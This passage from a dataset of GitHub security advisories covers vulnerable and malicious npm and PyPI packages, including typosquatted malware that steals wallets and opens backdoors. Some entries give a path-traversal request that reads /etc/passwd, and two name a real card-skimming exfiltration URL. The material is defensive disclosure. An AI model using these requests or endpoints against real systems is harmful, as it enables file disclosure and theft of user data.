+No fix is currently available. Consider using an alternative package until a fix is made available.",[],"[{'package': {'ecosystem': 'npm', 'name': 'larvitbase-www'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/526258'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1156'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:49:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8w74-g84v-c5w8,2023-09-05T23:04:40Z,2020-09-01T18:52:26Z,,['CVE-2017-16177'],Directory Traversal in chatbyvista,"Affected versions of `chatbyvista` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.",[],"[{'package': {'ecosystem': 'npm', 'name': 'chatbyvista'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16177'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/chatbyvista'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/462'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:24:03Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w725-67p7-xv22,2021-09-28T17:35:44Z,2020-09-03T17:05:04Z,,[],Command Injection in local-devices,"Versions of `local-devices` prior to 3.0.0 are vulnerable to Command Injection. The package does not validate input on ip addresses and concatenates it to an exec call, allowing attackers to run arbitrary commands in the system.
+
+
+## Recommendation
+
+Upgrade to version 3.0.0 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'local-devices'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DylanPiercey/local-devices/pull/16'}, {'type': 'WEB', 'url': 'https://github.com/DylanPiercey/local-devices/commit/57b9a933c9d23d34bd5a055536db824de66db553'}, {'type': 'PACKAGE', 'url': 'https://github.com/DylanPiercey/local-devices'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1020'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:24Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8j6j-4h2c-c65p,2020-08-31T18:44:11Z,2020-09-03T17:02:52Z,,[],Arbitrary Code Execution in require-node,"Versions of `require-node` prior to 1.3.4 for 1.x and 2.0.4 for 2.x are vulnerable to Arbitrary Code Execution. The package fails to sanitize requests to the `require-node` endpoint, allowing attackers to execute arbitrary code in the server through the injection of OS commands in the request body.
+
+
+## Recommendation
+
+- If you are using 1.x, upgrade to version 1.3.4 or later.
+- If you are using 2.x, upgrade to version 2.0.4 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'require-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'require-node'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1015'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:44:11Z', 'nvd_published_at': None}"
+1.4.0,GHSA-xhjx-mfr6-9rr4,2020-08-31T18:33:52Z,2020-09-01T21:20:28Z,,[],Command Injection in samsung-remote,"Versions of `samsung-remote` before 1.3.5 are vulnerable to command injection. This vulnerability is exploitable if user input is passed into the `ip` option of the package constructor.
+
+
+## Recommendation
+
+Update to version 1.3.5 or later.",[],"[{'package': {'ecosystem': 'npm', 'name': 'samsung-remote'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.5'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/394294'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/security-wg/blob/master/vuln/npm/465.json'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/734'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:33:52Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wpfc-3w63-g4hm,2021-10-01T13:28:35Z,2020-09-01T21:09:48Z,,[],Malicious Package in axois,"All versions of `axois` are considered malicious. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When executed, the package calls home to a Command and Control server to execute arbitrary commands.
+
+
+## Recommendation
+
+This package was published to the npm Registry for a very short period of time. If you happen to find it in your environment you should revoke and rotate all credentials found on the compromised machine, as well as completely erase the affected machine and reinstall your Operating System.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'axois'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/683'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:32:38Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p9g3-vpvp-hcj5,2021-09-29T20:56:22Z,2020-09-03T21:41:55Z,,[],Malicious Package in bufber-xor,"Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'bufber-xor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1234'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-762c-v946-pf25,2021-10-01T20:44:46Z,2020-09-04T16:47:33Z,,[],Malicious Package in bpi39,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bpi39'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1373'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:53Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fwvq-x4j9-hr5f,2021-10-01T20:50:01Z,2020-09-03T19:43:09Z,,[],Malicious Package in bs58chekc,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bs58chekc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1377'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:57:02Z', 'nvd_published_at': None}"
+1.4.0,GHSA-85q4-v37c-wfpc,2021-10-01T20:39:09Z,2020-09-04T15:39:28Z,,[],Malicious Package in bitcion-ops,"All versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
+The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'bitcion-ops'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1359'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:56:20Z', 'nvd_published_at': None}"
+1.4.0,GHSA-p7w2-mc6m-mfx2,2023-07-27T20:30:39Z,2020-09-11T21:22:25Z,,[],Malicious Package in scroool,"Version 0.1.7 of `scroool` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment and evaluate your application to determine whether or not user data was compromised.
+
+Users may consider downgrading to version 0.1.6",[],"[{'package': {'ecosystem': 'npm', 'name': 'scroool'}, 'versions': ['0.1.7']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/944'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:41:26Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qgfr-5hqp-vrw9,2023-04-18T14:49:55Z,2020-09-03T21:16:27Z,,['CVE-2020-12265'],Path Traversal in decompress,"Versions of `decompress` prior to 4.2.1 are vulnerable to Arbitrary File Write. The package fails to prevent extraction of files with relative paths, allowing attackers to write to any folder in the system by including filenames containing`../`.
+
+
+## Recommendation
+
+Upgrade to version 4.2.1 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'decompress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12265'}, {'type': 'WEB', 'url': 'https://github.com/kevva/decompress/issues/71'}, {'type': 'WEB', 'url': 'https://github.com/kevva/decompress/pull/73'}, {'type': 'WEB', 'url': 'https://github.com/kevva/decompress/commit/967146e70f48be32ed1a69daa3941d681944d513'}, {'type': 'PACKAGE', 'url': 'https://github.com/kevva/decompress'}]","{'cwe_ids': ['CWE-22', 'CWE-59'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:51:16Z', 'nvd_published_at': '2020-04-26T17:15:00Z'}"
+1.4.0,GHSA-w5gh-2wr2-pm6g,2021-08-26T15:16:58Z,2020-09-25T18:28:40Z,,['CVE-2020-15206'],Denial of Service in Tensorflow,"### Impact
+Changing the TensorFlow's `SavedModel` protocol buffer and altering the name of required keys results in segfaults and data corruption while loading the model. This can cause a denial of service in products using `tensorflow-serving` or other inference-as-a-service installments.
+
+We have added fixes to this in f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d (both going into TensorFlow 2.2.0 and 2.3.0 but not yet backported to earlier versions). However, this was not enough, as #41097 reports a different failure mode.
+
+### Patches
+We have patched the issue in adf095206f25471e864a8e63a0f1caef53a0e3a6 and will release patch releases for all versions between 1.15 and 2.3. Patch releases for versions between 1.15 and 2.1 will also contain cherry-picks of f760f88b4267d981e13f4b302c437ae800445968 and fcfef195637c6e365577829c4d67681695956e7d.
+
+We recommend users to upgrade to TensorFlow 1.15.4, 2.0.3, 2.1.2, 2.2.1, or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by Shuaike Dong, from Alipay Tian Qian Security Lab && Lab for Applied Security Research, CUHK.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w5gh-2wr2-pm6g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15206'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/adf095206f25471e864a8e63a0f1caef53a0e3a6'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f760f88b4267d981e13f4b302c437ae800445968'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/fcfef195637c6e365577829c4d67681695956e7d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:41:59Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-rjjg-hgv6-h69v,2021-08-26T15:11:03Z,2020-09-25T18:28:27Z,,['CVE-2020-15193'],Memory corruption in Tensorflow,"### Impact
+The implementation of `dlpack.to_dlpack` can be made to use uninitialized memory resulting in further memory corruption. This is because the pybind11 glue code assumes that the argument is a tensor:
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/python/tfe_wrapper.cc#L1361
+
+However, there is nothing stopping users from passing in a Python object instead of a tensor.
+```python
+In [2]: tf.experimental.dlpack.to_dlpack([2])
+==1720623==WARNING: MemorySanitizer: use-of-uninitialized-value
+ #0 0x55b0ba5c410a in tensorflow::(anonymous namespace)::GetTensorFromHandle(TFE_TensorHandle*, TF_Status*) third_party/tensorflow/c/eager/dlpack.cc:46:7
+ #1 0x55b0ba5c38f4 in tensorflow::TFE_HandleToDLPack(TFE_TensorHandle*, TF_Status*) third_party/tensorflow/c/eager/dlpack.cc:252:26
+...
+```
+
+The uninitialized memory address is due to a `reinterpret_cast`
+https://github.com/tensorflow/tensorflow/blob/0e68f4d3295eb0281a517c3662f6698992b7b2cf/tensorflow/python/eager/pywrap_tensor.cc#L848-L850
+
+Since the `PyObject` is a Python object, not a TensorFlow Tensor, the cast to `EagerTensor` fails.
+
+### Patches
+We have patched the issue in 22e07fb204386768e5bcbea563641ea11f96ceb8 and will release a patch release for all affected versions.
+
+We recommend users to upgrade to TensorFlow 2.2.1 or 2.3.1.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.1'}]}], 'versions': ['2.2.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.1'}]}], 'versions': ['2.3.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rjjg-hgv6-h69v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15193'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/22e07fb204386768e5bcbea563641ea11f96ceb8'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/releases/tag/v2.3.1'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00065.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-09-25T17:08:13Z', 'nvd_published_at': '2020-09-25T19:15:00Z'}"
+1.4.0,GHSA-hgwm-pv9h-q5m7,2021-10-04T21:19:55Z,2020-09-18T18:03:29Z,,[],Potential XSS in jQuery dependency in Mirador,"### Impact
+Mirador users less than v3.0.0 (alpha-rc) versions that have an unpatched jQuery. When adopters update jQuery they will find some of Mirador functionality to be broken.
+
+### Patches
+Mirador adopters should update to v3.0.0, no updates exist for v2.x releases.
+
+### Workarounds
+Yes, Mirador users could fork and create their own custom build of Mirador and make the bug fixes themselves.
+
+### References
+https://github.com/advisories/GHSA-gxr4-xjj5-5px2
+https://github.com/advisories/GHSA-jpcq-cgw6-v4j6
+
+
+https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/
+https://jquery.com/upgrade-guide/3.5/",[],"[{'package': {'ecosystem': 'npm', 'name': 'mirador'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0-alpha.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/ProjectMirador/mirador/security/advisories/GHSA-hgwm-pv9h-q5m7'}, {'type': 'PACKAGE', 'url': 'https://github.com/ProjectMirador/mirador'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-09-17T21:56:19Z', 'nvd_published_at': None}"
+1.4.0,GHSA-j9wj-26p5-fj2v,2023-09-11T16:36:19Z,2020-09-01T17:17:29Z,,['CVE-2017-16153'],Directory Traversal in gaoxuyan,"Affected versions of `gaoxuyan` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
+
+**Example request:**
+```http
+GET /../../../../../../../../../../etc/passwd HTTP/1.1
+host:foo
+```
+
+
+## Recommendation
+
+No patch is available for this vulnerability.
+
+It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'gaoxuyan'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-16153'}, {'type': 'WEB', 'url': 'https://github.com/JacksonGL/NPM-Vuln-PoC/tree/master/directory-traversal/gaoxuyan'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/378'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:21:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3f95-w5h5-fq86,2020-08-31T18:43:27Z,2020-09-11T21:22:24Z,,[],Prototype Pollution in mergify,"All versions of `mergify` are vulnerable to Prototype Pollution. The `mergify()` function allows attackers to modify the prototype of Object causing the addition or modification of an existing property that will exist on all objects.
+
+
+
+
+## Recommendation
+
+No fix is currently available. Consider using an alternative module as the package is deprecated.",[],"[{'package': {'ecosystem': 'npm', 'name': 'mergify'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}]}]","[{'type': 'WEB', 'url': 'https://hackerone.com/reports/439098'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/995'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:43:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-6fcr-9h9g-23fq,2021-09-27T22:31:00Z,2020-09-02T21:50:51Z,,[],Denial of Service in ipfs-bitswap,"Versions of `ipfs-bitswap` prior to 0.24.1 are vulnerable to Denial of Service (DoS). The package put unwanted blocks in the blockstore, which could be used to exhaust system resources in specific conditions.
+
+
+## Recommendation
+
+Upgrade to version 0.24.1 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/'}]","[{'package': {'ecosystem': 'npm', 'name': 'ipfs-bitswap'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.24.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/js-ipfs-bitswap/pull/194'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/js-ipfs-bitswap'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IPFSBITSWAP-174847'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/916'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:40:27Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wxrm-2h86-v95f,2021-09-29T20:45:26Z,2020-09-03T21:04:20Z,,[],Malicious Package in pizza-pasta,"Version 1.0.3 of `pizza-pasta` contains malicious code as a install scripts. The package created folders in the system's Desktop and downloaded an image from `imgur.com`. The package also printed the users SSH keys to the console.
+
+
+## Recommendation
+
+Remove the package from your environment. There are no evidences of further compromise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'pizza-pasta'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1196'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:50:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-377f-vvrc-9wgg,2021-09-30T20:07:38Z,2020-09-03T19:09:07Z,,[],Malicious Package in zemen,"Version 0.0.5 of `zemen` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
+
+
+
+## Recommendation
+
+Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'zemen'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.5'}, {'fixed': '0.0.6'}]}], 'versions': ['0.0.5']}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1101'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:47:17Z', 'nvd_published_at': None}"
+1.4.0,GHSA-hvgc-mggg-pxr2,2021-09-30T17:12:40Z,2020-09-03T23:02:33Z,,[],Malicious Package in js-sha7,"Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
+
+
+## Recommendation
+
+Remove the package from your environment. Ensure no Ethereum funds were compromised.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'js-sha7'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1284'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-08-31T18:53:44Z', 'nvd_published_at': None}"
+1.4.0,GHSA-f7g4-fm4c-54m9,2021-09-29T20:45:57Z,2020-09-03T21:06:31Z,,[],Malicious Package in yeoman-genrator,"Version 2.0.2 of `yoeman-generator` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
+
+
+## Recommendation
+
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
+
